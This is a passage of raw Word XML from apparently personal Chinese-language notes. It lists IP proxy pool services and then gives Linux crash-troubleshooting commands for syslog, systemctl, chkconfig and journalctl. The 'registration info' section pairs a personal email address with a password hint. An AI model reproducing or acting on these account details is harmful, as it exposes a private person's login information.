      <w:bookmarkEnd w:id="160"/>
    </w:p>
    <w:p w14:paraId="7538CC54" w14:textId="1F039BCB" w:rsidR="00FB1DB5" w:rsidRDefault="00FB1DB5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687C7629" w14:textId="2E697F61" w:rsidR="00FB1DB5" w:rsidRDefault="00FB1DB5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20488A5A" w14:textId="19F05792" w:rsidR="00800C0E" w:rsidRDefault="00800C0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345C2A59" w14:textId="4ED1558C" w:rsidR="00800C0E" w:rsidRDefault="00800C0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCBC50F" w14:textId="5753AB30" w:rsidR="00800C0E" w:rsidRDefault="00800C0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDB2901" w14:textId="77777777" w:rsidR="00800C0E" w:rsidRDefault="00800C0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F96050A" w14:textId="0F6E9025" w:rsidR="00FB1DB5" w:rsidRDefault="00FB1DB5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc159779622"/>
      <w:r>
        <w:t>Nps</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w14:paraId="1F9C9B48" w14:textId="1B14137C" w:rsidR="00FB1DB5" w:rsidRDefault="00FB1DB5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3C367D" w14:textId="5D034D53" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62BA42FD" w14:textId="1EA8DBF3" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0AAC4E" w14:textId="6780FA8F" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A193210" w14:textId="13A28228" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C67F30D" w14:textId="1AE40E3F" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A03362B" w14:textId="2841DAB3" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016FDF05" w14:textId="1DBBCD29" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc159779623"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理池：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>smartdaili</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="0D1F3028" w14:textId="0BA8B904" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00003EF8">
        <w:t>https://dashboard.smartdaili-china.com/register?page=residential-proxies/pricing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DFF67D" w14:textId="48BA4EAC" w:rsidR="00FB1DB5" w:rsidRDefault="00FB1DB5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E68FFD7" w14:textId="1486A7CD" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE02C75" w14:textId="744448EA" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r w:rsidRPr="00D93580">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>shenyanjian@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24A2C12B" w14:textId="179764EC" w:rsidR="00003EF8" w:rsidRDefault="00003EF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四五顺反密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260778B2" w14:textId="07ADF8AB" w:rsidR="00FB6C5A" w:rsidRDefault="00FB6C5A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38296DD8" w14:textId="713320E5" w:rsidR="00FB6C5A" w:rsidRDefault="00FB6C5A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5181E687" w14:textId="19F0E627" w:rsidR="00BA484E" w:rsidRDefault="00BA484E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc159779624"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理池：</w:t>
      </w:r>
      <w:r w:rsidR="00EC10F6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>快代理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="333165B9" w14:textId="569253E3" w:rsidR="00FB6C5A" w:rsidRDefault="00BA484E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA484E">
        <w:t>https://www.kuaidaili.com/pricing/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E8F2AF" w14:textId="77777777" w:rsidR="00FB6C5A" w:rsidRPr="00003EF8" w:rsidRDefault="00FB6C5A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF24EF6" w14:textId="2CCC03FE" w:rsidR="0001080A" w:rsidRDefault="0001080A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C1EBD6" w14:textId="77777777" w:rsidR="0001080A" w:rsidRPr="00E3694F" w:rsidRDefault="0001080A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13FBA222" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3787B424" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc159779625"/>
      <w:r>
        <w:t>Linux运维及shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w14:paraId="6C168EFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38784572" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习网站：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://c.biancheng.net/view/887.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790CEF77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E941AD" w14:textId="5B05FA83" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宕机应急</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A1D2B5" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C69C65" w14:textId="2E08D504" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5CB632" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3"/>
    <w:p w14:paraId="03BC1A53" w14:textId="6E096134" w:rsidR="001C58E3" w:rsidRPr="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="00340E54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="001C58E3">
        <w:t>/var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361D3A61" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宕机应急找的地方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A555FCD" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5848F6AA" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: 22-7-20 2:10-2:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022BC4A2" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64232B67" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Jul 20 02:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445033C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5699E618" w14:textId="77777777" w:rsidR="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令会记录在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>history</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中运行的命令不会记录在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4433FA56" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1917874B" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36ADF7C0" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B0660BC" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="00340E54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>journalctl:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9D9EC" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEA1377" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看所有服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F9A92E" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009047A1">
        <w:t>service --status-all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DC013B" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17282521" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看正在运行的服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A251DA7" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4E3B">
        <w:t>systemctl | grep running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEF987C" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB9C0F7" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看开机自启的服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C7736" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006D5283">
        <w:t>chkconfig --list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5FDED" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454B467D" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00777A6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据类型列出单元</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DBF7A2" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00034B81">
        <w:t>systemctl list-units --type service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7F3F7" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA3B4D">
        <w:t>systemctl list-unit-files --type service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24173D26" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A919C4B" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F25B9A5" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="554FC4F5" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7043D8EC" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些最引人注目的优势</w:t>
      </w:r>
      <w:r w:rsidRPr="00E457FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r w:rsidRPr="00E457FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是那些参与到流程和系统日志</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当使用其它工具，日志通常分散在整个系统中，由不同的守护程序和进程的处理，并且可以是相当困难的，当它们跨越多个应用来解释。</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Systemd</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试图通过用于记录</w:t>
      </w:r>
      <w:r w:rsidRPr="00E457FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所有内核</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供一个集中管理解决方案，以解决这些问题，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E457FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>并用户级进程</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004B08FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集和管理这些日志的系统称为日志。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E5C17A" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3C6D52" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常查看系统日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>journalctl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3A89FA" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCC1596" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不带任何选项</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>时，默认输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所有的日志记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7364E631" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00DFE9AE" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRPr="00D50019" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>journalctl -n [num]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29145FB3" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRPr="00C21CCC" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>显示最后</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>num</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>行的日志，如果省略</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>num,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>则默认显示最后</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA8254E" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ABE70F" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRPr="00C3795E" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3795E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>journalctl -b -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCBF1BF" w14:textId="77777777" w:rsidR="001C58E3" w:rsidRDefault="001C58E3" w:rsidP="001C58E3">
      <w:pPr>
        <w:jc w:val="left"/>
